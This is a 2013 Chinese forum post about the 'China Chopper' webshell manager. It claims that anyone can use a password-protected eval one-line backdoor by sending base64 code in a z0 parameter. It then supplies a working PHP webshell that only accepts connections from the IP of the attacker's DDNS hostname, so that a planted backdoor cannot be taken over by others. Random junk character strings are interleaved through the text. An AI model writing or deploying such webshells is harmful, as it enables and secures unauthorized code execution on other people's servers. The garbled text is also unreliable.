今天试了下“中国菜刀”这款C/S的WEB管理软件,发现一个致命的漏洞
4 c# ?* ?7 [: X3 T0 Q! W# _/ _, `/ s8 u& ^. Q3 w, x0 m W3 O/ \
就算你设置了密码,使用了eval($_REQUEST['moyo']);) o/ \/ q- t3 J
& z T6 y! Z$ K2 ^但是别人还是可以在不知道连接密码是moyo的情况下直接使用你的一句话后门
, ?- |( y6 h7 t. B" J5 P; a) ]
& R4 J! `5 k$ `+ i# _0 v因为$_REQUEST['moyo']传递的内容是@eval(base64_decode($_POST[z0]));$ `3 W$ Y4 b9 i! M* b! H
* ]8 E) B2 S6 r* o1 y: d直接访问 /backdoor.php?z0={BASE64加密后的代码} 就可以执行代码了1 N( v) d1 \# I6 ], ]
* n* |; _! ^: h) J4 u不知道是设计缺陷还是故意留的后门1 o1 d' s8 }% O. K# R. h1 V
/ x, N" v& Y1 C8 o9 h如果有人使用一句话之类的密码,有个小技巧可以避免自己的一句话被人盗用3 F" q* }* O; i
& }8 t2 M4 E5 b2 C本地使用花生壳之类的DDNS软件,比如分配域名是moyo.apiz.org' n4 k4 i3 ^; R0 G. _
{ U' @1 q/ a0 B然后一句话后门这样写% P! {3 M, `9 V, e5 `2 ]6 K; |
8 P8 a: T0 z6 p3 w4 G<?php $_SERVER['REMOTE_ADDR'] == gethostbyname('moyo.apiz.org') ? @eval($_REQUEST['moyo']) : exit('DENIED') ?>8 T% `* Y5 E4 _ `% W( {. g
这样就可以让一句话后门只允许自己的电脑连接了
6 L# `; [) [0 R9 c# t5 ` D8 r4 R3 K2 e E4 P! G
|
发表于 2013-7-26 12:45:48
收藏
支持
反对